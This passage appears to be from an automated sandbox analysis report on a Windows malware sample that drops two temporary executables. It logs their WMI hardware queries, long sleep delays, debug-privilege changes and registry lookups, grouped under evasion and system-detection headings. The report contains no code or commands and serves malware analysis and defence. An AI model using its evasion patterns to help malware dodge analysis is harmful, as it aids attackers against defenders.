                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                        Malware Analysis System Evasion

                                        barindex
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeMemory allocated: E70000 memory reserve | memory write watchJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeMemory allocated: 26B0000 memory reserve | memory write watchJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeMemory allocated: 16F0000 memory reserve | memory write watchJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeMemory allocated: 1B340000 memory reserve | memory write watchJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 922337203685477Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 922337203685477Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeThread delayed: delay time: 922337203685477Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeWindow / User API: threadDelayed 1158Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeWindow / User API: threadDelayed 6566Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWindow / User API: threadDelayed 2346Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeWindow / User API: threadDelayed 7505Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -100000s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 6804Thread sleep count: 1158 > 30Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -99875s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 6804Thread sleep count: 6566 > 30Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -99766s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -99641s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -99521s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -99405s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -99297s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -99187s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -99077s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -98915s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -98809s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -98656s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -98524s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -98422s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -98289s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -98172s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -98062s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -97953s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -97843s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -97734s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -97625s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -97516s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -97406s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -97297s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -97187s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -97078s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -96969s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -96859s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -96750s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -96641s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -96531s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -96422s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -96312s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -96203s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -96094s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -95984s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -95875s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -95766s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -95656s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -95547s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe TID: 3608Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 922337203685477Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 100000Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 99875Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 99766Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 99641Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 99521Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 99405Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 99297Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 99187Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 99077Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 98915Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 98809Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 98656Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 98524Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 98422Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 98289Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 98172Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 98062Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 97953Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 97843Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 97734Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 97625Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 97516Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 97406Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 97297Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 97187Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 97078Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 96969Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 96859Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 96750Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 96641Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 96531Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 96422Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 96312Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 96203Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 96094Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 95984Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 95875Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 95766Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 95656Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 95547Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeThread delayed: delay time: 922337203685477Jump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeThread delayed: delay time: 922337203685477Jump to behavior
                                        Source: FB_7BD8.tmp.exe, 00000002.00000002.4523857595.00000000009F8000.00000004.00000020.00020000.00000000.sdmp, FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess information queried: ProcessInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeProcess token adjusted: DebugJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess token adjusted: DebugJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeProcess token adjusted: DebugJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeMemory allocated: page read and write | page guardJump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe" Jump to behavior
                                        Source: C:\Users\user\Desktop\DJ5PhUwOsM.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe" Jump to behavior

                                        Language, Device and Operating System Detection

                                        barindex
                                        Source: Yara matchFile source: DJ5PhUwOsM.exe, type: SAMPLE
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe VolumeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe VolumeInformationJump to behavior
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                        Source: FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C1FF000.00000004.00000020.00020000.00000000.sdmp, FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C162000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
